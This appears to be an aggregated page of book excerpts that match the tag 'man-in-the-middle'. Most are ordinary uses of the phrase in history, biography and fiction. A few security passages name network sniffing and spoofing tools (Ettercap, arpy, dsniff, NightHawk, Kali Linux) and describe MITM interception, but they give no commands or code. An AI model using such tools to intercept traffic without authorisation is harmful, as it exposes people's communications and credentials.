Bush, the White House, and the Education of Paul O’Neill (New York: Simon & Schuster, 2004), 150. 8 That very morning “Key Goals Face Early Obstacles,” The Washington Post, February 27, 2001. 9 An NBC/Wall Street Journal poll “Public Buys Bush’s Tax-Cut Plan, but Details Magnify Differences,” The Wall Street Journal, March 8, 2001. 10 An even stronger tilt “Poll Analysis: Bush in Honeymoon Period,” Los Angeles Times, March 8, 2001. 11 “Washington derives so much of its power” Stevenson, “Itching to Rebuild the Tax Law.” 12 “Dirk is always well positioned” Jeffrey Birnbaum, “The Man in the Middle,” CNNMoney.​com, April 1, 2002, http://​money.​cnn.​com. 13 “That coalition was very important” Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 14 “The President has it backwards” “Bush Pushes Huge Tax Cut in U.S. Congress Debut,” Dallas Morning News, February 28, 2001. 15 Protests in several cities “Union Campaigns to Thwart Tax Cut Plan,” Atlanta Daily World, April 8, 2001. 16 Bush was the one urging voters Marc Lacey, “Bush Deploys Charm on Daschle in Pushing Tax Cut,” The New York Times, March 10, 2001. 17 A staggering $2 billion Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 18 The Business Roundtable The Center for Responsive Politics reported business interests pouring $333 million into the 2009–10 election campaign cycle.


pages: 600 words: 165,682

The Accidental Empire: Israel and the Birth of the Settlements, 1967-1977 by Gershom Gorenberg

anti-communist, bank run, colonial rule, facts on the ground, illegal immigration, MITM: man-in-the-middle, old-boy network, urban planning, Yom Kippur War

Meanwhile, the question of Samaria kept “coming up with longing and pain. As the years passed, the pain and shame became stronger,” Katzover recalled—shame that there was “empty territory,” that “the whole world sees…Samaria is empty.” In 1972 the idea still did not occur to Katzover that he would do something about it himself. But in his testimony, as in Etzion’s, is the first scent of an intoxicating impatience.39 THE MOST impatient man in the Middle East, though, was Anwar al-Sadat. Egypt’s leader wanted the Sinai Peninsula back. Recalling the lessons of his Nile Delta peasant childhood, speaking of neighbors who would fight for fifty years over a meter of land, he said in a New York Times interview after taking power that “our land…means our honor here…and one dies for this honor.” Sadat was willing to do almost anything to get the Sinai.


pages: 678 words: 159,840

The Debian Administrator's Handbook, Debian Wheezy From Discovery to Mastery by Raphaal Hertzog, Roland Mas

bash_history, Debian, distributed generation, do-ocracy, en.wikipedia.org, failed state, Firefox, GnuPG, Google Chrome, Jono Bacon, MITM: man-in-the-middle, NP-complete, QWERTY keyboard, RFC: Request For Comment, Richard Stallman, Skype, SpamAssassin, Valgrind, web application, zero day, Zimmermann PGP

Version 9 brings two major changes compared to previous versions. First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x). Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks. CULTURE DNSSEC The DNSSEC norm is quite complex; this partly explains why it's not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. → http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions 10.6.2. Configuring Configuration files for bind, irrespective of version, have the same structure.


pages: 604 words: 165,488

Mr Five Per Cent: The Many Lives of Calouste Gulbenkian, the World's Richest Man by Jonathan Conlin

accounting loophole / creative accounting, anti-communist, banking crisis, British Empire, carried interest, Ernest Rutherford, estate planning, Fellow of the Royal Society, light touch regulation, MITM: man-in-the-middle, Network effects, Pierre-Simon Laplace, rent-seeking, stakhanovite, Yom Kippur War

Bénard et Jarislowsky, Louis Dreyfus, Gulbenkian and the Syndicat des Banquiers de Province all had 15 per cent participations; Bemberg 10 per cent; Hirsch and Thalmann split the remaining 30 per cent between themselves. LDN00043. 30. ‘Siyasiyat: İstikraz Etrafında’, Tanin, 19 August 1910, p. 1. 31. Bompard to MAE, 17 October 1910. AMAE, CP Turquie 366, f. 90. For another perspective, see reports of 18 August and 17 September 1910. MBZ, CP Turquie 1909–10, ff. 69, 79. 32. ‘İstikraz Hakkında: Cavit Bey’in Beyanatı’, Tanin, 23 August 1910, p. 1. 33. For Laurent, see Ozan Ozavci, ‘A Man in the Middle: The Mission of Charles Laurent and the Young Turks’, in Gokhan Çetinsaya and Gül Tokay (eds.), Festschrift to Feroze A. K. Yasamee (Istanbul: ISIS Publications, forthcoming). 34. Le Temps, 20 September 1910. Hüseyin Cahit immediately picked up on this story, citing Le Temps as his source. ‘Yeni İstikraz’, Tanin, 20 September 1910, p. 1. 35. Cassel to CSG, 26 September 1910. LDN00039. 36.


pages: 577 words: 171,126

Light This Candle: The Life & Times of Alan Shepard--America's First Spaceman by Neal Thompson

Charles Lindbergh, Columbine, cuban missile crisis, Donald Trump, MITM: man-in-the-middle, Norman Mailer, place-making, Silicon Valley, William Langewiesche

That made some of the press happy but earned Shorty complaints from NASA and the astronauts that he was exploiting the Mercury Seven. “I think all seven guys really enjoyed the exposure—they are human and they don’t mind seeing their names in the papers,” Shorty once said. “Yet, as test pilots, they instinctively rebelled at having to spend time with the news media.” That continuous problem of being the man in the middle would literally drive Shorty to drink. A lot. And drink would one day cost him his job and, eventually, his life. In an effort to smooth the feathers that his press policies had ruffled, Shorty one day gathered the seven in a room at Langley and tried to explain that many reporters continued to accuse him, and the astronauts, of giving the Life people special access. A couple of the astronauts said they’d heard such flak at their press conferences, but it wasn’t their job to make any of them happy.


pages: 554 words: 168,114

Oil: Money, Politics, and Power in the 21st Century by Tom Bower

addicted to oil, Ayatollah Khomeini, banking crisis, bonus culture, corporate governance, credit crunch, energy security, Exxon Valdez, falling living standards, fear of failure, forensic accounting, index fund, interest rate swap, kremlinology, LNG terminal, Long Term Capital Management, margin call, Mikhail Gorbachev, millennium bug, MITM: man-in-the-middle, Nelson Mandela, new economy, North Sea oil, offshore financial centre, oil shale / tar sands, oil shock, passive investing, peak oil, Piper Alpha, price mechanism, price stability, Ronald Reagan, shareholder value, short selling, Silicon Valley, sovereign wealth fund, transaction costs, transfer pricing, zero-sum game, éminence grise

Explorers using 3D and 4D seismic, horizontal drills, multilateral wells and smart infill drilling were likely to increase production from mature wells and revive dry ones to extract over 50 percent of the oil, as BP had accomplished at Thunder Horse. The world consumed about 30 billion barrels every year. Contrary to Campbell’s scenario, the problem was not how much oil was in the ground, but how much the producers would spend to extract it. Guy Caruso, the head of the EIA, was the man in the middle of the two sides’ increasingly sterile arguments. Appointed by the George W. Bush administration in 2002 after serving for 12 years as an energy analyst at the CIA, Caruso had won star status by correctly forecasting the 1973 crisis, but he had also been involved in the mistaken CIA forecast in 1977 that Russia would become a net oil importer. Twenty-six years later, he acknowledged his misunderstanding, and disparaged the pessimism among the peak oil advocates, who relied on conservative, erratic and inconsistent data when so much depended upon price and technology.


pages: 544 words: 168,076

Red Plenty by Francis Spufford

affirmative action, anti-communist, Anton Chekhov, asset allocation, Buckminster Fuller, clean water, cognitive dissonance, computer age, double helix, Fellow of the Royal Society, John von Neumann, Kickstarter, Kitchen Debate, linear programming, market clearing, MITM: man-in-the-middle, New Journalism, oil shock, Philip Mirowski, plutocrats, Plutocrats, profit motive, RAND corporation, Simon Kuznets, the scientific method

What he needed here was the bottom of the top, someone with a junior post in senior management. Riffle riffle went the invisible card index. Ah yes, Ryszard: early forties, Pole from the Ukraine, wife religious, lots of children. Pleasant chap. Drinking problem. Probably not destined to rise. Chekuskin put the coin in the slot and dialled. ‘Ryszard, yes, hello?’ Harried-sounding voice; a man in the middle of something. ‘Chekuskin here. Sorry to bother you –’ ‘I can’t really talk. Later would be better.’ ‘Of course, of course, whenever you can. Maybe a drink this evening?’ ‘I don’t know. I’ve a family do. God, this is the Solkemfib thing, isn’t it?’ ‘Well, yes. There’s some puzzlement at this end –’ ‘I’m sorry, Chekuskin, but really, that’s one to leave alone. No joy to be had there. And honestly, that’s all I can say.


pages: 538 words: 164,533

1968: The Year That Rocked the World by Mark Kurlansky

anti-communist, Berlin Wall, colonial rule, cuban missile crisis, desegregation, East Village, Electric Kool-Aid Acid Test, European colonialism, feminist movement, global village, Haight Ashbury, land reform, Marshall McLuhan, Mikhail Gorbachev, MITM: man-in-the-middle, Norman Mailer, post-industrial society, Ronald Reagan, South China Sea

He was seeking a more pure communism and said that he hoped eventually to completely abolish money. 1968 was the year of the “new man” concept. Che had sought to build the new man, the socialist who worked for the common good, was dedicated to the revolution, and was without selfishness and greed. Now the new man was sometimes referred to as “a man like Che.” Castro first spoke of the new man in a speech in May 1967, but 1968, with the “revolutionary offensive” under way, was the year of the new man. In the middle of his speech about the new offensive, Castro referred to another new phenomenon. “There almost exists an air route for those who take over planes.” The week of Fidel’s speech, National Airlines flight 28 took off from Tampa bound for Miami. After five minutes in the air, two Cuban exiles took out pistols, forced the flight attendant to open the cockpit, and shouted, “Havana! Havana!” It was the seventh recent hijacking to Cuba, the third that month.


pages: 661 words: 187,613

The Language Instinct: How the Mind Creates Language by Steven Pinker

Albert Einstein, cloud computing, David Attenborough, double helix, Drosophila, elephant in my pajamas, finite state, illegal immigration, Joan Didion, Loebner Prize, mass immigration, Maui Hawaii, meta analysis, meta-analysis, MITM: man-in-the-middle, natural language processing, out of africa, phenotype, rolodex, Ronald Reagan, Sapir-Whorf hypothesis, Saturday Night Live, speech recognition, Steven Pinker, theory of mind, transatlantic slave trade, Turing machine, Turing test, twin studies, Yogi Berra

Let loose on our page, it would create the following: * * * Socrates is a man Every man is mortal Socrates * * * Its second reflex, also in response to finding an isa, is to get itself to the right of that isa and copy any ink marks it finds there into the holes of a new cutout. In our case, this forces the processor to make a cutout in the shape of man. Its third reflex is to scan down the page checking for ink marks shaped like Every, and if it finds some, seeing if the ink marks to the right align with its new cutout. In our example, it finds one: the man in the middle of the second line. Its fourth reflex, upon finding such a match, is to move to the right and copy the ink marks it finds there onto the bottom center of the page. In our example, those are the ink marks ismortal. If you are following me, you’ll see that our page now looks like this: * * * Socrates isa man Every man ismortal Socrates ismortal * * * A primitive kind of reasoning has taken place.


pages: 840 words: 202,245

Age of Greed: The Triumph of Finance and the Decline of America, 1970 to the Present by Jeff Madrick

accounting loophole / creative accounting, Asian financial crisis, bank run, Bretton Woods, business cycle, capital controls, collapse of Lehman Brothers, collateralized debt obligation, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, desegregation, disintermediation, diversified portfolio, Donald Trump, financial deregulation, fixed income, floating exchange rates, Frederick Winslow Taylor, full employment, George Akerlof, Hyman Minsky, income inequality, index fund, inflation targeting, inventory management, invisible hand, John Meriwether, Kitchen Debate, laissez-faire capitalism, locking in a profit, Long Term Capital Management, market bubble, minimum wage unemployment, MITM: man-in-the-middle, money market fund, Mont Pelerin Society, moral hazard, mortgage debt, Myron Scholes, new economy, North Sea oil, Northern Rock, oil shock, Paul Samuelson, Philip Mirowski, price stability, quantitative easing, Ralph Nader, rent control, road to serfdom, Robert Bork, Robert Shiller, Robert Shiller, Ronald Coase, Ronald Reagan, Ronald Reagan: Tear down this wall, shareholder value, short selling, Silicon Valley, Simon Kuznets, technology bubble, Telecommunications Act of 1996, The Chicago School, The Great Moderation, too big to fail, union organizing, V2 rocket, value at risk, Vanguard fund, War on Poverty, Washington Consensus, Y2K, Yom Kippur War

Financial writer Michael Lewis, then a Salomon novice, in his first-person account of working at Salomon Brothers in these years, quoted Dall as saying of Ranieri, “He was tough-minded. He didn’t mind hiding a million-dollar loss from a manager, if that’s what it took. He didn’t let morality get in his way. Well, morality is not the right word, but you know what I mean.” Trading was the key to profits in the new mortgage department. Ranieri, the man in the middle, had the information about supply and demand and also the deep financial pockets of a house like Salomon. Ranieri was not merely aggressive and willing to cut corners; he was by every account smart. “I have never seen anyone, educated or uneducated, with a quicker mind,” said Dall, whom Ranieri eventually forced out of the department. But it was the struggles of the thrifts in the late 1970s and early 1980s that made his trading desk Salomon’s most profitable operation for several years.


pages: 659 words: 203,574

The Collected Stories of Vernor Vinge by Vernor Vinge

anthropic principle, Asilomar, back-to-the-land, dematerialisation, gravity well, invisible hand, low earth orbit, Machinery of Freedom by David Friedman, MITM: man-in-the-middle, source of truth, technological singularity, unbiased observer, Vernor Vinge

There was a shadow on the porch where no shadow should have been. Sanda slammed the bolt to just as the doorknob began to turn. Behind her, Grandmother stared in shocked silence. Sanda spun and ran toward the kitchen. Once they had the intruders locked out, what could she and Gran do without a phone? She nearly ran into him in the kitchen. Sanda sucked in a breath so hard she squeaked. He was big and hooded. He also had a knife. Strange to see such a man in the middle of the glistening white kitchen—the homey, comforting, safe kitchen. From the living room came the sound of splintering wood and Grandmother screamed. Running footsteps. Something metal being kicked over. Grandmother screamed again. “Shut your mouth, lady. I said, shut it.” The voice—though not the tone—was vaguely familiar. “Now where is that prissy little wimp?” “I got her in here,” called the man in the kitchen.


Ubuntu 15.04 Server with systemd: Administration and Reference by Richard Petersen

Amazon Web Services, bash_history, cloud computing, Debian, Firefox, Mark Shuttleworth, MITM: man-in-the-middle, RFC: Request For Comment, SpamAssassin, web application

The traceroute command will return a list of hosts the route traverses, along with the times for three probes sent to each gateway. Times greater than five seconds are displayed with a asterisk, *. traceroute rabbit.mytrek.com You can also use the mtr or xmtr tools to perform both ping and traces (Traceroute on the System Tools menu). Ettercap Ettercap is a sniffer program designed to detect Man in the Middle attacks. In this kind of attack, packets are detected and modified in transit to let an unauthorized user access a network. You can use either its graphical interface or its command line interface. Ettercap can perform Unified sniffing on all connections, or Bridged sniffing on a connection between network interfaces. Ettercap uses plugins for specific tasks, like dos_attack to detect Denial of Service attacks and dns-spoof for DNS spoofing detection.


pages: 706 words: 202,591

Facebook: The Inside Story by Steven Levy

active measures, Airbnb, Airbus A320, Amazon Mechanical Turk, Apple's 1984 Super Bowl advert, augmented reality, Ben Horowitz, blockchain, Burning Man, business intelligence, cloud computing, computer vision, crowdsourcing, cryptocurrency, don't be evil, Donald Trump, East Village, Edward Snowden, El Camino Real, Elon Musk, Firefox, Frank Gehry, glass ceiling, indoor plumbing, Jeff Bezos, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, Lyft, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, move fast and break things, natural language processing, Network effects, Oculus Rift, PageRank, Paul Buchheit, paypal mafia, Peter Thiel, pets.com, post-work, Ray Kurzweil, recommendation engine, Robert Mercer, Robert Metcalfe, rolodex, Sam Altman, Sand Hill Road, self-driving car, sexual politics, Shoshana Zuboff, side project, Silicon Valley, Silicon Valley startup, slashdot, Snapchat, social graph, social software, South of Market, San Francisco, Startup school, Steve Ballmer, Steve Jobs, Steven Levy, Steven Pinker, Tim Cook: Apple, web application, WikiLeaks, women in the workforce, Y Combinator, Y2K

It takes a certain amount of chutzpah to present people with a privacy tool whose purpose was to gain their data. Facebook now had a powerful way to monitor the mobile activity of thousands of users. The Growth team would study the data carefully, and post results in their regular meetings. Onavo paid special attention to Snapchat. Evan Spiegel’s company had security features to block intruders, but according to one Facebook executive, Onavo used a “man-in-the-middle” attack to get past the wall and gather data. Snapchat discovered this and put in protections to thwart the intrusions. With Onavo, a Facebook executive confirmed to me, the company was “able to inject code into Snap and could see how people were actually using the product internally.” (According to The Wall Street Journal, Snapchat would add this episode to a file it kept of Facebook’s actions, calling it “Project Voldemort,” after the Harry Potter villain whose name cannot be spoken.)


pages: 807 words: 225,326

Werner Herzog - a Guide for the Perplexed: Conversations With Paul Cronin by Paul Cronin

Albert Einstein, Atahualpa, Berlin Wall, Francisco Pizarro, Kickstarter, land reform, MITM: man-in-the-middle, out of africa

He talked about evading security guards when he was setting up the equipment he needed to make the walk from one tower to the other. He and a co-conspirator were about to be busted, so he started pushing his colleague aggressively, shouting things like, “You’re doing a lousy job! What’s the matter with you? I told you Tuesday, not Wednesday!” The two of them stormed off and the guard didn’t dare say anything. No one wants to interfere with a man in the middle of a fight. Philippe pointed out that the opposite also works, that people won’t bother you when you’re laughing your heart out. A participant at one Rogue session was a former hostage negotiator; he’ll surely make a fine filmmaker. Another told us the story of a film he was making in Portugal about street kids. He had been filming for weeks with a group and got release forms signed by every child and parent but one.


pages: 747 words: 218,317

Look Homeward, Angel by Thomas Wolfe

fear of failure, index card, MITM: man-in-the-middle, Own Your Own Home

I knew at once when you stopped using that pony. Your translation is not so smooth, but it's your own now. You're doing good work, my boy, and you're getting something out of it. It's worth it, isn't it?" "Yes," said Eugene gratefully, "it certainly is--" By far the most distinguished of his teachers this first year was Mr. Edward Pettigrew ("Buck") Benson, the Greek professor. Buck Benson was a little man in the middle-forties, a bachelor, somewhat dandified, but old-fashioned, in his dress. He wore wing collars, large plump cravats, and suede-topped shoes. His hair was thick, heavily grayed, beautifully kept. His face was courteously pugnacious, fierce, with large yellow bulging eyeballs, and several bulldog pleatings around the mouth. It was an altogether handsome ugliness. His voice was low, lazy, pleasant, with an indolent drawl, but without changing its pace or its inflection he could flay a victim with as cruel a tongue as ever wagged, and in the next moment wipe out hostility, restore affection, heal all wounds by the same agency.


pages: 669 words: 210,153

Tools of Titans: The Tactics, Routines, and Habits of Billionaires, Icons, and World-Class Performers by Timothy Ferriss

Airbnb, Alexander Shulgin, artificial general intelligence, asset allocation, Atul Gawande, augmented reality, back-to-the-land, Ben Horowitz, Bernie Madoff, Bertrand Russell: In Praise of Idleness, Black Swan, blue-collar work, Boris Johnson, Buckminster Fuller, business process, Cal Newport, call centre, Charles Lindbergh, Checklist Manifesto, cognitive bias, cognitive dissonance, Colonization of Mars, Columbine, commoditize, correlation does not imply causation, David Brooks, David Graeber, diversification, diversified portfolio, Donald Trump, effective altruism, Elon Musk, fault tolerance, fear of failure, Firefox, follow your passion, future of work, Google X / Alphabet X, Howard Zinn, Hugh Fearnley-Whittingstall, Jeff Bezos, job satisfaction, Johann Wolfgang von Goethe, John Markoff, Kevin Kelly, Kickstarter, Lao Tzu, lateral thinking, life extension, lifelogging, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Mason jar, Menlo Park, Mikhail Gorbachev, MITM: man-in-the-middle, Nelson Mandela, Nicholas Carr, optical character recognition, PageRank, passive income, pattern recognition, Paul Graham, peer-to-peer, Peter H. Diamandis: Planetary Resources, Peter Singer: altruism, Peter Thiel, phenotype, PIHKAL and TIHKAL, post scarcity, post-work, premature optimization, QWERTY keyboard, Ralph Waldo Emerson, Ray Kurzweil, recommendation engine, rent-seeking, Richard Feynman, risk tolerance, Ronald Reagan, selection bias, sharing economy, side project, Silicon Valley, skunkworks, Skype, Snapchat, social graph, software as a service, software is eating the world, stem cell, Stephen Hawking, Steve Jobs, Stewart Brand, superintelligent machines, Tesla Model S, The Wisdom of Crowds, Thomas L Friedman, Wall-E, Washington Consensus, Whole Earth Catalog, Y Combinator, zero-sum game

To learn about some of the starting tools a hacker, attacker, or someone just curious about security would use, I’d suggest looking at beginning tools such as Wireshark, Charles (web debugging proxy), NightHawk (ARP/ND spoofing and password sniffing), arpy (ARP spoofing), dsniff (password sniffing), and Kali Linux (penetration testing) and looking up tutorials on network intrusion, sniffing, and man-in-the-middling. Within a few minutes and with a tool like Wireshark, you can start seeing all the traffic going in and out of your computer, while tools like Nighthawk and arpy in conjunction with Wireshark can help you inspect and intercept all traffic on a network! To further dive into security, I’d suggest learning to program. It’s easier than you think! Learning to program allows you to learn how someone might engineer something and helps you think about how you can then reverse that and exploit it, as if you had created it yourself.


The Oil Kings: How the U.S., Iran, and Saudi Arabia Changed the Balance of Power in the Middle East by Andrew Scott Cooper

addicted to oil, anti-communist, Ayatollah Khomeini, banking crisis, Boycotts of Israel, energy security, falling living standards, friendly fire, full employment, interchangeable parts, Kickstarter, land reform, MITM: man-in-the-middle, oil shale / tar sands, oil shock, peak oil, Ponzi scheme, RAND corporation, rising living standards, Robert Bork, rolodex, Ronald Reagan, strikebreaker, unbiased observer, uranium enrichment, urban planning, Yom Kippur War

Ford Library. 284 $20 million over five years: Pranay Gupte, “Lobbyists in Iran Paid by Grumman,” New York Times, December 13, 1975. 284 “It was normal practice”: Ibid. 284 Members of Congress demanded to know: Ibid. 284 second $200 million loan offered: Ibid. 284 an audit prepared by Northrop Corporation’s accounting firm: Ibid. 284 $200 million in kickbacks: Michael C. Jensen, “Bribes by Northrop of $450,000 for 2 Saudi Generals Reported,” New York Times, June 5, 1975. 284 Prominent among the “sales agents”: William H. Jones, “Northrop’s Man in the Middle East,” Washington Post, June 7, 1975. 284 leveraged his background in intelligence: David Binder, “Northrop Cites Undercover Role,” New York Times, June 7, 1975. 284 “running close to a billion dollars”: Ibid. 284 “old personal friend”: Ibid. 284 “The Shah could not have been more cordial personally”: Ibid. 284 Roosevelt to ask the Shah to lobby: Gaylord Shaw, “Senate Unit Tells of More Northrop Payoffs Abroad,” Los Angeles Times, June 7, 1975. 285 paid $2,697,067: Martin R.


America in the World by Robert B. Zoellick

Albert Einstein, anti-communist, banking crisis, battle of ideas, Berlin Wall, Bretton Woods, British Empire, Corn Laws, coronavirus, cuban missile crisis, defense in depth, Deng Xiaoping, Donald Trump, Douglas Engelbart, Douglas Engelbart, energy security, European colonialism, facts on the ground, Fall of the Berlin Wall, hypertext link, illegal immigration, immigration reform, imperial preference, Isaac Newton, Joseph Schumpeter, land reform, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, Norbert Wiener, Paul Samuelson, RAND corporation, reserve currency, Ronald Reagan, Ronald Reagan: Tear down this wall, Scramble for Africa, Silicon Valley, The Wealth of Nations by Adam Smith, trade liberalization, transcontinental railway, undersea cable, Vannevar Bush, War on Poverty

McCullough, Truman, 530. 39. Lawrence Kaplan, The Conversion of Senator Arthur H. Vandenberg: From Isolation to International Engagement (Lexington, KY: University Press of Kentucky, 2015), 87 (citing Vandenberg’s papers) and 169. 40. See Haas, Harry and Arthur, 2 for forty-seven days; Kaplan, Conversion, 1–3 (citing James Reston in 1948 on “qualities of enterprise”); and Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 4–6, 70, 119. 41. Meijer, Vandenberg, 4. 42. Meijer, Vandenberg, 6–9; Kaplan, Conversion, 2–4. 43. Kaplan, Conversion, 3–4, 8, 11–14; Meijer, Vandenberg, 16. 44. Vandenberg believed that Alexander Hamilton represented a superior mix of nationalism, conservativism, and progressivism. The activist editor, a rapid writer, published in the 1920s two biographies of Hamilton.


pages: 903 words: 235,753

The Stack: On Software and Sovereignty by Benjamin H. Bratton

1960s counterculture, 3D printing, 4chan, Ada Lovelace, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Web Services, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, carbon footprint, carbon-based life, Cass Sunstein, Celebration, Florida, charter city, clean water, cloud computing, connected car, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, disintermediation, distributed generation, don't be evil, Douglas Engelbart, Douglas Engelbart, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, Hyperloop, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, Jaron Lanier, Joan Didion, John Markoff, Joi Ito, Jony Ive, Julian Assange, Khan Academy, liberal capitalism, lifelogging, linked data, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Network effects, new economy, offshore financial centre, oil shale / tar sands, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, RAND corporation, recommendation engine, reserve currency, RFID, Robert Bork, Sand Hill Road, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, Slavoj Žižek, smart cities, smart grid, smart meter, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, TaskRabbit, the built environment, The Chicago School, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator

For Sino-Google geopolitics, the platform could theoretically be available at a billion-user scale to those who live in China, even if Google is not technically “in China,” because those Users, acting through and as foreign proxies, are themselves, as far as the Internet geography is concerned, both in and not in China. Developers of uProxy believe that it would take two simultaneous and synchronized man-in-the-middle attacks to hack the link, and at population scale, that should prove difficult even for the best state actors, for now. (More disconcerting perhaps is that such a framework could just as easily be used to withdraw data from a paired site—a paired “user”—that for good reasons should be left alone.) Any plural User subject that is conjoined by a proxy link or other means could be composed of different types of addressable subjects: two humans in different countries, or a human and a sensor, a sensor and a bot, a human and a robot and a sensor, a whatever and a whatever.


pages: 965 words: 267,053

A History of Zionism by Walter Laqueur

Albert Einstein, anti-communist, British Empire, business cycle, illegal immigration, joint-stock company, land reform, Mahatma Gandhi, mass immigration, means of production, MITM: man-in-the-middle, new economy, plutocrats, Plutocrats, profit motive, strikebreaker, the market place, éminence grise

Many liberals and Socialists felt that national distinctions were losing their importance all over the world, and that the Jews, because they had no national home, would be in the vanguard of this movement towards one global culture, one way of life. They did not share the belief that God had created peoples to exist forever and that each of them had an eternal mission. One of the heroes in Gottfried Keller’s Fähnlein der sieben Aufrechten, a stalwart Swiss patriot, raised the question in discussion with his friends: Just as a man in the middle of his life and at the height of his strength will think of death, so he should consider in a quiet hour that his fatherland will vanish one day … because everything in this world is subject to change … is it not true that greater nations than ours have perished? Or do you want to continue existing like the Eternal Jew who cannot die, who has buried Egypt, Greece, and Rome and is still serving the newly emerged peoples?


George Marshall: Defender of the Republic by David L. Roll

anti-communist, British Empire, Charles Lindbergh, David Brooks, Defenestration of Prague, Donald Trump, European colonialism, fear of failure, invisible hand, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, one-China policy, one-state solution, Ralph Waldo Emerson, Simon Kuznets, South China Sea, Steve Jobs, trade liberalization, Works Progress Administration, yellow journalism

New York: Simon & Schuster, 1992. McFarland, Keith, and David L. Roll. Louis Johnson and the Arming of America: The Roosevelt and Truman Years. Bloomington: Indiana University Press, 2005. Medoff, Rafael. Jewish Americans and Political Participation. Santa Barbara, CA: ABC-CLIO, 2002. Mee, Charles L. Jr. The Marshall Plan. New York: Simon & Schuster, 1984. Meijer, Hendrik. Arthur Vandenberg: The Man in the Middle of the American Century. Chicago: University of Chicago Press, 2017. Melby, John F. The Mandate of Heaven: Record of a Civil War, China 1945–49. Garden City, NY: Anchor Books, 1971. Miller, Merle. Plain Speaking: An Oral Biography of Harry S. Truman. New York: Black Dog & Leventhal, 2005. Millis, Walter, ed. The Forrestal Diaries. New York: Viking, 1951. Mills, Nicolaus. Winning the Peace: The Marshall Plan & America’s Coming of Age as a Superpower.


pages: 1,212 words: 312,349

Dhalgren by Samuel R. Delany

MITM: man-in-the-middle, sexual politics

Which is a good introduction to why over the charred grass stopped conversation. A climb across rocks and among green brush jarred it loose again. Cathedral told Priest the black stone building in the smoke was the Weather Tower. I still don't see any vanes, aerials, or anemometers. We came around a corner, left hips brushing head-sized stones, right hips (elbows up) scratched by bushes. The man in the middle of the court was bent over a tripod. As we came toward him, he looked up: Captain Kamp. Who still didn't recognize me until we were on top of him. "…Kid?" "Hello, Captain." He laughed now. "Now you fellows looked pretty ominous coming across there." He debated whether to give his hand for shaking. Which Angel solved by giving his. They hooked thumbs. "Angel," Angel said. The pink and brown fists locked, shook.


pages: 1,327 words: 360,897

Demanding the Impossible: A History of Anarchism by Peter Marshall

agricultural Revolution, anti-communist, anti-globalists, Bertrand Russell: In Praise of Idleness, clean water, collective bargaining, colonial rule, David Graeber, different worldview, do-ocracy, feminist movement, garden city movement, hive mind, Howard Zinn, invisible hand, laissez-faire capitalism, land reform, land tenure, Lao Tzu, liberation theology, Machinery of Freedom by David Friedman, Mahatma Gandhi, means of production, MITM: man-in-the-middle, Naomi Klein, open borders, Panopticon Jeremy Bentham, plutocrats, Plutocrats, post scarcity, profit motive, Ralph Waldo Emerson, road to serfdom, Ronald Reagan, sexual politics, the market place, union organizing, wage slave, washing machines reduced drudgery

Woodcock has suggested that in their view of man’s place in the world, anarchists believed in a modified version of the Great Chain of Being.9 In fact, the conception of the universe as a Chain of Being, and the principles which underline this conception — plenitude, continuity, and gradation — were deeply conservative. Moreover, the hierarchical cosmogony of the Chain of Being, with its gradations from beast to angels with man in the middle, reflected the social hierarchy of the period. In the eighteenth century, it led to the belief that there could be no improvement in the organization of society and to Pope’s conclusion that ‘whatever is, is right’.10 Indeed, it was only towards the end of the eighteenth century when the static notion of a Chain of Being was temporalized and replaced by a more evolutionary view of nature that progressive thinkers began to appeal to nature as a touchstone to illustrate the shortcomings of modern civilization.


pages: 1,199 words: 384,780

The system of the world by Neal Stephenson

bank run, British Empire, cellular automata, Edmond Halley, Fellow of the Royal Society, high net worth, Isaac Newton, James Watt: steam engine, joint-stock company, large denomination, MITM: man-in-the-middle, place-making, the market place, trade route, transatlantic slave trade

